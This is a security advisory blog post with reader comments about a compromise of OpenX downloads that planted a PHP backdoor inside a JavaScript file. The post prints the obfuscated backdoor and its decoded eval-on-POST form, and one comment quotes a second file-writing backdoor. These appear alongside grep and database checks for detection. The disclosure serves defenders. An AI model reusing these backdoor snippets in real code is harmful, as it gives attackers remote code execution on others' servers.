Compromised and Downloads Injected with a Backdoor

We received reports that was compromised and the OpenX download files had a backdoor injected in them. According to Heise (in German), the malicious files were modified around November/2012, and have been undetected since.

It means that if you have downloaded OpenX during the last 7 months, it likely contains a backdoor that could allow the attackers full access to your site. That’s how serious it is.

*The OpenX team have confirmed the breach and removed the bad files from their servers.

OpenX Backdoor

We didn’t get access to the infected package yet, but based on some public sources, the backdoor is hidden inside:


It can be found by searching for PHP tags inside .js files.

This is what the backdoor looks like:

this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
*/$j='ex'./**/'plode'; /* if(this.className ...

If you look close you can see the PHP code mingled with the JavaScript code, which is meant to make it harder to detect.

After decoding it looks like this:

eval ( $_[1]($_[0]( $_POST[$_[2]])) );

This allows the attackers to execute any PHP code via the “eval” function.

Here is a simple command to find if your OpenX install has the backdoor:

$ grep -r --include "*.js" '<?php' DIRECTORYWHEREYOURSITEIS

Our team is still investigating the issue, and we will provide more details soon.

  1. Attacker then puts lots of files with code like this:

    ?php if (sha1($_REQUEST[z]) == ‘[REDACTED]’){@file_put_contents(stripslashes($_REQUEST[e]),stripslashes($_REQUEST[t]));die(md5(‘md5’));}

    on the server (often replacing “file_put_contents” with “system” or “call_user_func” etc.), plus a couple of more complex backdoors containing obfuscated PHP code.

    Best way to check installation is to run a diff versus a clean download of the same version.

  2. Files found not present in default installation containing obfuscated code:


  3. Also, when compromised, look in the “banners” table of your OpenX database for cases where
    prepend != ”
    or more precisely
    prepend LIKE ‘%iframe%’
    This will typically show Javascript code trying to exploit client vulnerabilities. Attacker seems to overwrite all contents of all “prepend” fields with the same JS code.

    1. Read my postings below.
      Main focus seemed to be to deliver malware with the ads delivered, though attacker might use his own backdoors for further malicious activities later if system isn’t patched.

  4. No, no solution until now. Today 24/09/2013, the version is Openx 2.8.11. And this problem still there.

    Is a shame, the “paid” version has this problem?

Comments are closed.

You May Also Like